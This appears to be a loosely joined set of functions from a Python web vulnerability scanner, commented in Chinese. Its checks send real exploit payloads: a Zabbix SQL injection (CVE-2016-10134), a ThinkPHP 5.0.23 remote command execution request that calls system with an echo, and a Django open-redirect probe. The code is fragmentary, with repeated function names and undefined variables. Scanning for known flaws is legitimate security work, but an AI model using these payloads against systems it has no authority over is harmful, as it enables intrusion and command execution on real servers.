def __init__(self, host): self.urls = [] self.js = [] self.domain = '' self.host = host self.result = [] self.req = Requests()
def verify_https(url): # 验证域名是http或者https的 # 如果域名是302跳转 则获取跳转后的地址 req = Requests() url2 = parse.urlparse(url) if url2.netloc: url = url2.netloc elif url2.path: url = url2.path # noinspection PyBroadException try: r = req.get('https://' + url) getattr(r, 'status_code') if r.status_code == 302 or r.status_code == 301: r = req.get('https://' + 'www.' + url) if r.status_code == 200: return 'https://' + 'www.' + url return 'https://' + url except Exception as e: # noinspection PyBroadException try: req.get('http://' + url) return 'http://' + url except Exception: pass
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): payload = r"/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17" try: r = req.get(url + payload) if ('ed733b8d10be225eceba344d533586' in r.text) or ('SQL error ' in r.text): return 'CVE-2016-10134 zabbix sqli:' + url except Exception as e: pass
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num) try: headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = req.request(url + '/index.php?s=captcha', 'post', data=payload, headers=headers) if random_num in r.text: return 'thinkphp_5_0_23_rce | ' + url except Exception as e: pass
def check(url, ip, ports, apps): req = Requests() if verify(vuln, ports, apps): payload = "//www.example.com" try: r = req.get(url + payload) if r.is_redirect and 'www.example.com' in r.headers.get( 'Location'): return 'Django < 2.0.8 任意URL跳转漏洞' except Exception as e: pass
def get_info(url): try: req = Requests() for i in path: r = req.get(url + i) if r.status_code == 200 and '<html>' not in r.text: if not re.search(r'{"\w+":', r.text): if verify(r.text): return 'leaks : ' + url + i except: pass
def ipinfo(host): out = [] if not re.search(r'\d+\.\d+\.\d+\.\d+', host): req = Requests() try: r = req.get( 'https://viewdns.info/iphistory/?domain={}'.format(host)) result = re.findall( r'(?<=<tr><td>)\d+\.\d+\.\d+\.\d+(?=</td><td>)', r.text, re.S | re.I) if result: for i in result: if iscdn(i): out.append(i) except: pass return out